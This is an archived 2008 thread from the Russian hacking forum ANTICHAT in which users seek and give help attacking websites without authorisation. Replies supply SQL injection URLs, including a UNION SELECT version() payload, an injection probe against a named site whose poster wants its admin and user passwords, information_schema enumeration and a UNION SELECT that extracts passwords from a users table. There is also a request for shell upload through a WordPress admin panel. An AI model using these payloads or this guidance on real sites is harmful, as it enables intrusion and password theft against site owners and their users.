ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

04.02.2008, 10:14
|
|
Новичок
Регистрация: 10.11.2006
Сообщений: 24
Провел на форуме: 59656
Репутация:
17
|
|
доберешься если сможешь повысить свои привелегии либо через ,fpe дибо через скрипты
|
|
|
Уязвимость через ошибку FatalException |

04.02.2008, 17:48
|
|
Новичок
Регистрация: 18.12.2007
Сообщений: 2
Провел на форуме: 11968
Репутация:
0
|
|
Уязвимость через ошибку FatalException
В общем при передаче переменной query строки возникает ошибка:
http://site.ru/js/rs.php?query=SELECT *
Fatal error: Class 'FatalException' not found in /opt/vhosts/jnet/www/lib/DB.php on line 241
Что значит эта ошибка, и можно ли использовать уязвимость сделать sql иньецию?
|
|
|

04.02.2008, 19:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
вобщем то, эта ошибка не говорит о том, можно ли или нет провести инъекцию, просто когда возникает ошибка, вызываются функции определенного класса, а этот класс скрипт просто не может найти и все, попробуй сделать правильный скуль запрос
да скуль есть, вот нашел:
Код:
http://site/js/rs.php?query=1%20union%20select%201,version(),3,4,5/*
смотрим исходник страницы, видим
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 04.02.2008 в 19:32..
|
|
|

05.02.2008, 02:03
|
|
Новичок
Регистрация: 24.01.2008
Сообщений: 20
Провел на форуме: 39650
Репутация:
15
|
|
Прошу помочь если вообще способы залившке шелла через админку WordPress'a?
|
|
|

05.02.2008, 04:38
|
|
Новичок
Регистрация: 29.01.2007
Сообщений: 2
Провел на форуме: 39860
Репутация:
0
|
|
Буду признателен если
Всем привет , в кратце обьясню , всю жизнь работал СИ , вполне успешно никогда не жаловался =) ! Сейчас встал вопрос скажем так прогресса , вопрос куда двигаться от чего плясать , ЗАРАНЕЕ извеняюсь если задам кучу глупых вопросов , всё что я прошу подсказать , дальше сам разберусь .
есть сайтик нуу допустим http://portal.kurkino.net.ru/ насмотревшись всяких крутых роликов я начал с дуру подбирать всякие словечки в итоге нашёл "test.php" "/test/" "/test/admin/" как я понял сервак стоит на апаче , нооо дальше я не ушёл , и вот в чём просьба , скажите пожалуйста , а лучше киньте ссылки на статьи , предположим цель ну скажем выведать пороли пользователей или пороли админа , какие технологии и вообще знания стоят применять , Всё что связанно с соц инженерии сразу отпадает я и так всё знаю , уже не интересно , я крайне надеюсь что вы поняли чего я хочу , просто подскажите что к чему и зачем . Заранее спасибо
П.С.- с удовольствием возьму уроки(естессно не бесплатно) у знающего дело профессионала , который мне всё разжуёт ! Спасибо за внимание. Не судите строго.
|
|
|

05.02.2008, 11:59
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме: 1379382
Репутация:
378
|
|
хм...
на роль "знающего профессионала" я не претемндую, но все же выскажу парочку своих соображений:
1. во-первых, (хотя это дело вкуса) посмотрел бы движок сайта. что-то мне подсказывает, что там должна быть скуль (SQL-inj).
http://portal.kurkino.net.ru/portal.php?module=news&view_gid=4'
Про скули почитай в этой же ветке форума.
2. во-вторых, сайтец построен как минимум на двух движках:
- движок сайта - смотри в самом низу страницы: Portal System ULN-Web. Зная PHP и имея на руках исходные его коды можно самому найти уязвимость в двиге. Как вариант - пошерстить по багтракам - мож уязвимость там уже нашли.
- движок форума - см. выше.
А вот для изучения исходников тебе понадобится выучить PHP. На ачате для этого материалов предостаточно.
И вообще, как вариант, можешь, опять же на форуме просто попросить взломать сайт =)
удачи...
|
|
|

05.02.2008, 12:05
|
|
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
Провел на форуме: 1536533
Репутация:
370
|
|
m0use, ты видишь все таблицы SQL, там же будут и от форума.
UPDATE имя_таблицы SET поле=значение
|
|
|

05.02.2008, 22:15
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме: 256744
Репутация:
16
|
|
Сообщение от Lesnoy_chelovek
m0use, ты видишь все таблицы SQL, там же будут и от форума.
Втом то и дело что некоторые таблицы я вижу а именно таблиц форума я не нашел.
Сообщение от Lesnoy_chelovek
UPDATE имя_таблицы SET поле=значение
как это в брайзере должно выглядеть, методом тыка уже пробовал и UNION добавлял и без него... поэтому и спрашиваю как правильно!?
|
|
|

05.02.2008, 21:26
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
bobob, возможно таблицы находятся в других базах. Узнай базу таблицы:
... , concat(table_name,0x3a,table_schema), ... +from+information_schema.tables
а потом пиши имя базы перед именем таблицы
... ,password, ... +from+имя_базы.users/*
А возможно просто нету доступа к этим таблицам :\
|
|
|

05.02.2008, 21:38
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
Типа такого
script.php?id=-1+union+select+1,2,password,4+from+used.used_users/*
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|